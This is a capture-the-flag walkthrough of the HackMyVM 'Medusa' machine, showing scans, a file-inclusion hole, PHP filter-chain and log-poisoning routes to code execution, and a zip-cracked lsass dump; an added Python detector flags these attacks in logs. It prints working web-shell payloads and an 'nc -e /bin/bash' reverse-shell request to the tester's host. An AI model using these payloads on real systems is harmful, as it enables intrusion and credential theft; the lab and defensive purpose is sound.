HackMyVM-Medusa-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.200 08:00:27:83:be:4d PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e3:9f:ef VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.082 seconds (122.96 hosts/sec). 4 responded
export ip=192.168.60.200
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.200:22
Open 192.168.60.200:21
Open 192.168.60.200:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 14:16 CST
Initiating ARP Ping Scan at 14:16
Scanning 192.168.60.200 [1 port]
Completed ARP Ping Scan at 14:16, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:16
Completed Parallel DNS resolution of 1 host. at 14:16, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:16
Scanning 192.168.60.200 [3 ports]
Discovered open port 80/tcp on 192.168.60.200
Discovered open port 22/tcp on 192.168.60.200
Discovered open port 21/tcp on 192.168.60.200
Completed SYN Stealth Scan at 14:16, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.60.200
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-02-22 14:16:27 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:83:BE:4D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)


Directory scan: there is a /hades directory; everything else is the Apache default page.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.200
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10674]
/manual (Status: 301) [Size: 317] [--> http://192.168.60.200/manual/]
/hades (Status: 301) [Size: 316] [--> http://192.168.60.200/hades/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Comparing it with the stock Apache default page, though, shows a small modification.

❯ diff index.html default_index
6c6
< <title>Apache2 Debian Default Page: It works</title>
---
> <title>Apache2 Test Debian Default Page: It works</title>
38c38
< background-color: #555555;
---
> background-color: #FFFFFF;
95c95
< background-color: #999999;
---
> background-color: #FFFFFF;
351c351
< rel="nofollow">Kraken</a> open the door.
---
> rel="nofollow">existing bug reports</a> before reporting a new bug.


This gives the keyword Kraken.


Scanning again turns up a door.php.

❯ gobuster dir -u http://$ip/hades -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.200/hades
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 0]
/door.php (Status: 200) [Size: 555]
Progress: 568520 / 1038220 (54.76%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 570795 / 1038220 (54.98%)
===============================================================
Finished
===============================================================

Visiting it shows a form; the input is limited to 6 characters.


Try entering the Kraken found above.

This yields a domain name.


Edit the hosts file.

Wfuzz

Fuzz for subdomains.

This finds dev.medusa.hmv.

❯ wfuzz -c -u "http://medusa.hmv" -H "HOST:FUZZ.medusa.hmv" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 929
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://medusa.hmv/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000019: 200 25 L 285 W 1973 Ch "dev - dev"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 804
Filtered Requests: 803
Requests/sec.: 0


Add it to hosts.

A curl gives:

❯ sudo vim /etc/hosts
❯ curl dev.medusa.hmv
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="css/styles.css">

<title>Medusa</title>
</head>
<body>
<h1 class="h1">The myth of Medusa: the deadly Gorgon</h1>
<div class="center">
<img class="img" width="430px" src="assets/medusa.jpg" alt="medusa">
</div>

<p class="p">In Greek mythology "medusa" means guardian or protector, and is one of the three gorgons that lived in the underworld. Her main characteristic is that she could turn into stone anyone who was reached by her gaze.
Medusa, Steno and Euryale, were monsters, gorgons of Greek mythology, who were born from the primordial sea god, Forcis, and Ceto, an aquatic monster. Humans and gods feared them, as the snakes in their hair, their long fangs and claws, complemented a rather frightening appearance.
The gorgons Steno and Euryale were immortal. Medusa was the only mortal and, at the same time, she was the most beautiful. It is said that her power of petrification was given to her as protection, since she was mortal.
There are several versions of the gorgon myth... One of them is that she was a monster from birth. Another version of why Medusa went from being a beautiful mortal to being a monster like her sisters is that of Ovid.
He tells that Medusa was a very beautiful young woman, a priestess in a temple of Athena. She was so beautiful that Poseidon fell in love with her and ended up raping her in the temple.
This made Athena, the goddess of wisdom, furious, so she decided to turn her into a monster like her sisters. The curse of turning anyone who saw her into stone was a punishment for breaking her vow of celibacy, and for "seducing" Poseidon in his temple.
在希腊神话中,“美杜莎”意味着守护者或保护者,是生活在地底世界的三个蛇发女妖之一。她的主要特征是,任何被她凝视到的人都会变成石头。
美杜莎、斯特诺和尤里亚勒是希腊神话中的怪物、女妖,他们出生于原始海神福尔西斯和水怪刻托之间。人类和众神都害怕她们,因为她们头发上的毒蛇、长长的獠牙和爪子使得她们看起来非常可怕。
斯特诺和尤里亚勒是不朽的。美杜莎是唯一一个凡人,并且同时也是最美丽的。据说她具有石化能力作为自我保护,因为她本身就是凡人。
关于女妖传说有许多版本...其中之一认为她从出生开始就是一个怪物。另一个版本解释了为什么美杜莎从一个漂亮的凡人变成了像姐妹那样恐怖的怪物,这个版本由欧维德提供。
他讲述了美杜莎曾经是一个非常漂亮年轻女子,在雅典娜庙中担任祭司。 她如此迷人以至于波塞冬爱上了她,并最终在寺庙里强暴了她。
这激怒了智慧女神雅典娜, 所以决定将其变成像姐妹那样恶魔般形象. 将任何看见过自己 的 人 石化 是对打破贞洁誓言 和 在他 的 寺 庙 “ 引诱 ” 波赛顿 的 惩罚 。
</p>
</body>
</html>

Scan the subdomain's directories.

❯ gobuster dir -u http://dev.medusa.hmv -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.medusa.hmv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 1973]
/files (Status: 301) [Size: 316] [--> http://dev.medusa.hmv/files/]
/assets (Status: 301) [Size: 317] [--> http://dev.medusa.hmv/assets/]
/css (Status: 301) [Size: 314] [--> http://dev.medusa.hmv/css/]
/manual (Status: 301) [Size: 317] [--> http://dev.medusa.hmv/manual/]
/robots.txt (Status: 200) [Size: 489]
Progress: 947819 / 1038220 (91.29%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 948910 / 1038220 (91.40%)
===============================================================
Finished
===============================================================

There is a robots.txt, which, ha, is Medusa ASCII art.

❯ curl http://dev.medusa.hmv/robots.txt
,--.
,--. .--,`) ) .--,
.--,`) \( (` /,--./ (`
( ( ,--. ) )\ /`) ).--,-.
;.__`) )/ /) ) ( (( (`_) )
( ( / /( (.' "-.) )) )__.'-,
_,--.( ( /` `,/ ,--,) )
( (``) \,` ==. .== \( (`,-;
;-,( (_) ~6~ \ / ~6~ (_) )_) )
( (_ \_ ( )( )__/___.'
'.__,-,\ \ '' /\ ,-.
( (_/ /\ __ /\ \_) )
'._.' \ \__/ / '._.'
.--`\ /`--.
'----'

Scan the files directory again.

❯ gobuster dir -u http://dev.medusa.hmv/files -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.medusa.hmv/files
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 0]
/system.php (Status: 200) [Size: 0]
/readme.txt (Status: 200) [Size: 144]

Another hint.

❯ curl http://dev.medusa.hmv/files/readme.txt
-----------------------------------------------
+ Don't trust your eyes, trust your instinct +
-----------------------------------------------

There is also a system.php.

LFI (Local File Inclusion)

Guessing it might have an LFI, fuzzing the parameter name gives view.

❯ wfuzz -c -u "http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 --hc 404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd
Total requests: 26584

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000245: 200 27 L 40 W 1452 Ch "view"
000007399: 200 0 L 0 W 0 Ch "members-area"

Total time: 0
Processed Requests: 7397
Filtered Requests: 7396
Requests/sec.: 0

This gives the user spectre.

❯ curl http://dev.medusa.hmv/files/system.php\?view\=/etc/passwd |grep /bin/bahs
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1452 100 1452 0 0 683k 0 --:--:-- --:--:-- --:--:-- 1417k
❯ curl http://dev.medusa.hmv/files/system.php\?view\=/etc/passwd |grep /bin/bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1452 100 1452 0 0 599k 0 --:--:-- --:--:-- --:--:-- 708k
root:x:0:0:root:/root:/bin/bash
spectre:x:1000:1000:spectre,,,:/home/spectre:/bin/bash

Port 21 was seen open earlier; brute-forcing FTP went nowhere, so back to the LFI, trying PHP filters to read the user's private key file: also nothing.

LFI2RCE

File Inclusion/Path traversal - HackTricks

LFI2RCE via PHP Filters - HackTricks

synacktiv/php_filter_chain_generator

By abusing PHP filters you can generate arbitrary content as output, which means you can produce arbitrary PHP code and have it executed.

Use the script to generate a <?php phpinfo(); ?>

❯ python3 php_filter_chain_generator.py -help
usage: php_filter_chain_generator.py [-h] [--chain CHAIN]
[--rawbase64 RAWBASE64]
php_filter_chain_generator.py: error: argument -h/--help: ignored explicit argument 'elp'
❯ python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'
[+] The following gadget chain will generate the following code : <?php phpinfo(); ?> (base64 value: PD9waHAgcGhwaW5mbygpOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|con
vert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|conv
ert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

Visiting it does indeed inject the phpinfo code.


Check whether any functions are disabled.


Since none are, try writing a one-liner web shell <?=`$_GET[0]`?>

and pop a shell directly.

❯ python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]`?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]`?> (base64 value: PD89YCRfR0VUWzBdYD8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF3
2|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp



There is another route here: RCE through the vsftpd.log log file.

Port 21 is open, as seen above.

Write a one-liner web shell into the log, then include the log via the LFI to execute commands.

File Inclusion/Path traversal - HackTricks

❯ ftp $ip
Connected to 192.168.60.200.
220 (vsFTPd 3.0.3)
Name (192.168.60.200:Pepster): <?php system($_GET['cmd']);?>
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.


Pop a shell as usual; note that with curl the payload has to be URL-encoded.

❯ curl "http://dev.medusa.hmv/files/system.php/?view=/var/log/vsftpd.log&cmd=nc%20-e%20/bin/bash%20192.168.60.100%204444"
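From the defender's side, the two LFI-to-RCE routes used above (the PHP filter chain fed to the view parameter, and the PHP tag written into vsftpd.log by a failed FTP login and then included through the same parameter) leave distinctive traces in the web and FTP logs. The detector below is an added example for this write-up, not code from the original post or from the tools it uses; the log lines are constructed for the demo, and apart from the view parameter, the /files/system.php path and /var/log/vsftpd.log taken from the walkthrough, every name in it is assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit, unquote

# Apache combined log: client, timestamp, request line, status (rest ignored).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# vsftpd writes the login name verbatim between brackets; that is how a PHP
# tag typed as the FTP user name ends up inside /var/log/vsftpd.log.
VSFTPD_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] \[(?P<user>.*?)\] '
    r'(?P<event>FAIL LOGIN|OK LOGIN): Client "(?P<client>[^"]+)"'
)
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self", "/var/log/", "/home/", ".ssh")
PHP_TAG = re.compile(r"<\?(php|=)")


def classify_value(value):
    """Reasons one query-parameter value looks like a file-inclusion payload."""
    v = unquote(value)
    reasons = []
    if v.startswith("php://") or "/resource=" in v:
        reasons.append("php-wrapper")
    stages = v.count("|convert.") + v.count("/convert.")
    if stages >= 2:  # one base64 stage is ordinary; generated chains have dozens
        reasons.append("filter-chain(%d stages)" % stages)
    if "../" in v or (v.startswith("/") and any(s in v for s in SENSITIVE)):
        reasons.append("sensitive-path")
    if "/var/log/" in v:
        reasons.append("log-include")
    return reasons


def scan_access_log(text):
    """Findings for every request whose query string carries an LFI payload."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        reasons = []
        for name, values in params.items():
            for val in values:
                reasons += ["%s: %s" % (name, r) for r in classify_value(val)]
        # Including a log file while passing a second parameter is the
        # execution step of log poisoning (the ...&cmd=... request above).
        if any(r.endswith("log-include") for r in reasons) and len(params) > 1:
            reasons.append("log-poison-exec")
        if reasons:
            findings.append({"src": "apache", "client": m["ip"], "ts": m["ts"],
                             "path": url.path, "reasons": reasons})
    return findings


def scan_vsftpd_log(text):
    """Findings for FTP login attempts whose user name carries a PHP tag."""
    findings = []
    for line in text.splitlines():
        m = VSFTPD_RE.match(line)
        if m and PHP_TAG.search(m["user"]):
            findings.append({"src": "vsftpd", "client": m["client"], "ts": m["ts"],
                             "path": "/var/log/vsftpd.log",
                             "reasons": ["php-tag-in-username"]})
    return findings


# Constructed sample logs (not captured traffic): the first three Apache lines
# mirror the requests made in the walkthrough, the fourth is a benign include.
ACCESS_LOG = """\
192.168.60.100 - - [22/Feb/2025:15:10:01 +0800] "GET /files/system.php?view=/etc/passwd HTTP/1.1" 200 1452 "-" "curl/8.5.0"
192.168.60.100 - - [22/Feb/2025:15:12:44 +0800] "GET /files/system.php?view=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp HTTP/1.1" 200 6810 "-" "curl/8.5.0"
192.168.60.100 - - [22/Feb/2025:15:20:05 +0800] "GET /files/system.php/?view=/var/log/vsftpd.log&cmd=id HTTP/1.1" 200 2210 "-" "curl/8.5.0"
10.0.0.7 - - [22/Feb/2025:15:21:00 +0800] "GET /files/system.php?view=about.html HTTP/1.1" 200 1973 "-" "Mozilla/5.0"
"""
VSFTPD_LOG = """\
Sat Feb 22 16:30:12 2025 [pid 1234] [<?php system($_GET['cmd']);?>] FAIL LOGIN: Client "192.168.60.100"
Sat Feb 22 16:31:40 2025 [pid 1240] [anonymous] FAIL LOGIN: Client "192.168.60.100"
"""


def scan_all():
    return scan_access_log(ACCESS_LOG) + scan_vsftpd_log(VSFTPD_LOG)


if __name__ == "__main__":
    for f in scan_all():
        print("%-7s %-15s %-28s %s" % (f["src"], f["client"], f["path"], ", ".join(f["reasons"])))
```

Run as a script it prints one line per finding. The stage count is the useful discriminator: a legitimate php://filter use has a single convert.base64-encode, whereas the generator output on this page runs to dozens of convert.iconv stages, and a vsftpd FAIL LOGIN whose user name contains <?php is the poisoning step itself, so it can be alerted on before the include ever happens.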

Privilege Escalation to User

Listen on the port.

❯ pwncat-cs -lp 4444
[16:46:20] Welcome to pwncat 🐈! __main__.py:164
[16:47:02] received connection from 192.168.60.200:57922 bind.py:84
[16:47:22] 192.168.60.200:57922: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@medusa:/var/www/dev/files$

Upload linpeas and run it.

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/.../old_files.zip
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/log/vsftpd.log
/var/tmp

This reveals /.../old_files.zip; download it locally and extract it.

It needs a password; crack it with john.

❯ x old_files.zip
extract: extracting to old_files
Archive: /home/Pepster/hmv/old_files.zip
skipping: lsass.DMP need PK compat. v5.1 (can do v4.6)
❯ zip2john old_files.zip >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 12386830 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
medusa666 (old_files.zip/lsass.DMP)
1g 0:00:00:49 DONE (2025-02-22 17:02) 0.02040g/s 115523p/s 115523c/s 115523C/s megan0308..medabe15
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ 7z x old_files.zip

7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 12387024 bytes (12 MiB)

Extracting archive: old_files.zip
--
Path = old_files.zip
Type = zip
Physical Size = 12387024


Would you like to replace the existing file:
Path: ./lsass.DMP
Size: 34804383 bytes (34 MiB)
Modified: 2023-01-17 22:12:41
with the file from archive:
Path: lsass.DMP
Size: 34804383 bytes (34 MiB)
Modified: 2023-01-17 22:12:41
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y


Enter password (will not be echoed):
Everything is Ok

Size: 34804383
Compressed: 12387024

That gives a dump file, but how do you open it?

file shows it is a minidump crash report.

❯ file lsass.DMP
lsass.DMP: Mini DuMP crash report, 12 streams, Tue Jan 17 14:08:32 2023, 0x1826 type

